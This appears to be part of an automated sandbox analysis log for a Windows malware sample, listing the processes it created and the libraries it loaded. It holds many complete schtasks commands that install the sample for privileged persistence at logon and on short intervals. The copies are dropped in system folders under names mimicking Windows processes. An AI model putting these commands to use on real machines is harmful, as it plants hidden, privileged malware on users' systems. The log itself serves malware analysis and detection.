Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 10 /tr "'C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe'" /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 6 /tr "'C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe'" /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 12 /tr "'C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 10 /tr "'C:\Recovery\MwDxnowBVCiAiIllnkPs.exe'" /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Recovery\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 14 /tr "'C:\Recovery\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\jdownloader\StartMenuExperienceHost.exe'" /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\jdownloader\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 12 /tr "'C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe'" /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 13 /tr "'C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe "C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe"
Source: unknown	Process created: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe
Source: unknown	Process created: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe
Source: unknown	Process created: C:\Recovery\RuntimeBroker.exe C:\Recovery\RuntimeBroker.exe
Source: unknown	Process created: C:\Recovery\RuntimeBroker.exe C:\Recovery\RuntimeBroker.exe
Source: unknown	Process created: C:\Windows\twain_32\SgrmBroker.exe C:\Windows\twain_32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\twain_32\SgrmBroker.exe C:\Windows\twain_32\SgrmBroker.exe
Source: unknown	Process created: C:\ProgramData\sihost.exe "C:\Users\All Users\sihost.exe"
Source: unknown	Process created: C:\ProgramData\sihost.exe "C:\Users\All Users\sihost.exe"
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process created: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe "C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: netfxperf.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: esentprf.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: perfts.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: utildll.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: msdtcuiu.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: msdtcprx.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: mtxclu.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: clusapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: resutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: msscntrs.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: perfdisk.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: wmiclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: perfnet.dll	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: mscoree.dll
